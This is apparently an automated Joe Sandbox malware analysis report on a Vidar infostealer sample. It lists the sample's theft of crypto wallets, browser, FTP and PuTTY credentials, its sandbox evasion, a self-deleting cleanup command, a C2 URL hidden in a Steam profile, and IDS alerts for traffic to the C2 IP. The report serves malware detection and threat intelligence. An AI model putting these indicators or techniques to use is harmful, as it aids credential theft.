Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
UMrFwHyjUi.exe

Overview

General Information

Sample name:UMrFwHyjUi.exe
renamed because original name is a hash value
Original sample name:0d90ef55d1b1cb43ccb8fd30bbeba1a4.exe
Analysis ID:1540306
MD5:0d90ef55d1b1cb43ccb8fd30bbeba1a4
SHA1:5230fea74e8c4dedda59cbcdd13a9bc7ad035ac0
SHA256:13cf27504612ba911a324205db08dfa22cc42f3cb7e2600a69b65091ac528940
Tags:exeuser-abuse_ch
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Country aware sample found (crashes after keyboard check)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • UMrFwHyjUi.exe (PID: 1004 cmdline: "C:\Users\user\Desktop\UMrFwHyjUi.exe" MD5: 0D90EF55D1B1CB43CCB8FD30BBEBA1A4)
    • UMrFwHyjUi.exe (PID: 4432 cmdline: "C:\Users\user\Desktop\UMrFwHyjUi.exe" MD5: 0D90EF55D1B1CB43CCB8FD30BBEBA1A4)
    • UMrFwHyjUi.exe (PID: 5768 cmdline: "C:\Users\user\Desktop\UMrFwHyjUi.exe" MD5: 0D90EF55D1B1CB43CCB8FD30BBEBA1A4)
      • cmd.exe (PID: 7976 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBFCBGCGIJKJ" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 8020 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
    • WerFault.exe (PID: 6636 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1004 -s 272 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199786602107"], "Botnet": "0b3bd69430b7d827b107ba2ed809207d"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
              00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 9 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.2.UMrFwHyjUi.exe.1c2c60.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  0.2.UMrFwHyjUi.exe.1c2c60.1.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                    2.2.UMrFwHyjUi.exe.400000.2.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      2.2.UMrFwHyjUi.exe.400000.2.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                        0.2.UMrFwHyjUi.exe.1c2c60.1.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                          Click to see the 5 entries

                          Sigma Signatures

                          No Sigma rule has matched

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-23T17:05:26.076725+020020287653Unknown Traffic192.168.2.44974595.217.220.103443TCP
                          2024-10-23T17:05:28.135906+020020287653Unknown Traffic192.168.2.44974795.217.220.103443TCP
                          2024-10-23T17:05:29.688673+020020287653Unknown Traffic192.168.2.44974895.217.220.103443TCP
                          2024-10-23T17:05:31.232344+020020287653Unknown Traffic192.168.2.44974995.217.220.103443TCP
                          2024-10-23T17:05:32.791542+020020287653Unknown Traffic192.168.2.44975095.217.220.103443TCP
                          2024-10-23T17:05:34.407637+020020287653Unknown Traffic192.168.2.44975195.217.220.103443TCP
                          2024-10-23T17:05:35.663703+020020287653Unknown Traffic192.168.2.44975295.217.220.103443TCP
                          2024-10-23T17:05:41.857068+020020287653Unknown Traffic192.168.2.44975395.217.220.103443TCP
                          2024-10-23T17:05:56.315756+020020287653Unknown Traffic192.168.2.44975695.217.220.103443TCP
                          2024-10-23T17:05:58.360770+020020287653Unknown Traffic192.168.2.44976295.217.220.103443TCP
                          2024-10-23T17:06:00.539870+020020287653Unknown Traffic192.168.2.44977295.217.220.103443TCP
                          2024-10-23T17:06:02.343684+020020287653Unknown Traffic192.168.2.44978295.217.220.103443TCP
                          2024-10-23T17:06:06.824500+020020287653Unknown Traffic192.168.2.44980895.217.220.103443TCP
                          2024-10-23T17:06:11.079987+020020287653Unknown Traffic192.168.2.44983395.217.220.103443TCP
                          2024-10-23T17:06:14.862988+020020287653Unknown Traffic192.168.2.44985795.217.220.103443TCP
                          2024-10-23T17:06:18.020599+020020287653Unknown Traffic192.168.2.44987495.217.220.103443TCP
                          2024-10-23T17:06:20.034709+020020287653Unknown Traffic192.168.2.44988695.217.220.103443TCP
                          2024-10-23T17:06:27.037332+020020287653Unknown Traffic192.168.2.44992295.217.220.103443TCP
                          2024-10-23T17:06:28.315052+020020287653Unknown Traffic192.168.2.44993095.217.220.103443TCP
                          2024-10-23T17:06:29.881096+020020287653Unknown Traffic192.168.2.44994195.217.220.103443TCP
                          2024-10-23T17:06:31.473792+020020287653Unknown Traffic192.168.2.44995095.217.220.103443TCP
                          2024-10-23T17:06:33.570468+020020287653Unknown Traffic192.168.2.44996395.217.220.103443TCP
                          2024-10-23T17:06:36.063596+020020287653Unknown Traffic192.168.2.44997695.217.220.103443TCP
                          2024-10-23T17:06:37.609359+020020287653Unknown Traffic192.168.2.44998795.217.220.103443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-23T17:05:31.883540+020020442471Malware Command and Control Activity Detected95.217.220.103443192.168.2.449749TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-23T17:05:33.452370+020020518311Malware Command and Control Activity Detected95.217.220.103443192.168.2.449750TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-23T17:05:33.452105+020020490871A Network Trojan was detected192.168.2.44975095.217.220.103443TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Found malware configuration
                          Source: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199786602107"], "Botnet": "0b3bd69430b7d827b107ba2ed809207d"}
                          Multi AV Scanner detection for submitted file
                          Source: UMrFwHyjUi.exeReversingLabs: Detection: 65%
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Machine Learning detection for sample
                          Source: UMrFwHyjUi.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,2_2_004080A1
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,2_2_00408048
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00411E32 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,2_2_00411E32
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0040A7AD _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,2_2_0040A7AD
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBAA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,2_2_6CBAA9A0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBA44C0 PK11_PubEncrypt,2_2_6CBA44C0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB74420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,2_2_6CB74420
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBA4440 PK11_PrivDecrypt,2_2_6CBA4440
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBF25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,2_2_6CBF25B0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB8E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,2_2_6CB8E6E0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB88670 PK11_ExportEncryptedPrivKeyInfo,2_2_6CB88670
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBAA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,2_2_6CBAA650
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBCA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,2_2_6CBCA730
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBD0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,2_2_6CBD0180
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBA43B0 PK11_PubEncryptPKCS1,PR_SetError,2_2_6CBA43B0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBC7C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,2_2_6CBC7C00
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBCBD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,2_2_6CBCBD30
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB87D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,2_2_6CB87D60
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CBC9EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,2_2_6CBC9EC0
                          Source: UMrFwHyjUi.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 92.122.104.90:443 -> 192.168.2.4:49743 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 95.217.220.103:443 -> 192.168.2.4:49745 version: TLS 1.2
                          Source: UMrFwHyjUi.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Source: Binary string: mozglue.pdbP source: UMrFwHyjUi.exe, 00000002.00000002.2720919729.000000006CEFD000.00000002.00000001.01000000.00000009.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.2.dr
                          Source: Binary string: freebl3.pdb source: UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
                          Source: Binary string: freebl3.pdbp source: UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
                          Source: Binary string: nss3.pdb@ source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.2.dr
                          Source: Binary string: softokn3.pdb@ source: UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: UMrFwHyjUi.exe, 00000002.00000002.2712188709.0000000035E57000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.2.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: UMrFwHyjUi.exe, 00000002.00000002.2705821873.0000000029F71000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.2.dr
                          Source: Binary string: nss3.pdb source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.2.dr
                          Source: Binary string: mozglue.pdb source: UMrFwHyjUi.exe, 00000002.00000002.2720919729.000000006CEFD000.00000002.00000001.01000000.00000009.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.2.dr
                          Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: UMrFwHyjUi.exe, 00000002.00000002.2690551002.0000000017C91000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694047636.000000001DC08000.00000002.00001000.00020000.00000000.sdmp
                          Source: Binary string: softokn3.pdb source: UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_001AD2FE FindFirstFileExW,0_2_001AD2FE
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 1_2_001AD2FE FindFirstFileExW,1_2_001AD2FE
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00416013 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00416013
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0041547D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_0041547D
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00409CF1 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00409CF1
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00414D08 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,2_2_00414D08
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00401D80
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0040D59B FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040D59B
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0040B5B4 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040B5B4
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0040BF22 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_0040BF22
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0040B914 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040B914
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00415B4D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,2_2_00415B4D
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_0040CD0C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,2_2_0040CD0C
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00415182 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,2_2_00415182
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]0_2_001C350D
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 4x nop then mov dword ptr [ebp-04h], eax0_2_001C350D
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]2_2_004014AD
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 4x nop then mov dword ptr [ebp-04h], eax2_2_004014AD

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49750 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 95.217.220.103:443 -> 192.168.2.4:49750
                          Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 95.217.220.103:443 -> 192.168.2.4:49749
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199786602107
                          Source: global trafficHTTP traffic detected: GET /profiles/76561199786602107 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                          Source: Joe Sandbox ViewIP Address: 92.122.104.90 92.122.104.90
                          Source: Joe Sandbox ViewIP Address: 95.217.220.103 95.217.220.103
                          Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                          Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                          Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49748 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49747 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49750 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49745 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49749 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49752 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49751 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49753 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49756 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49772 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49782 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49762 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49808 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49833 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49857 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49874 -> 95.217.220.103:443
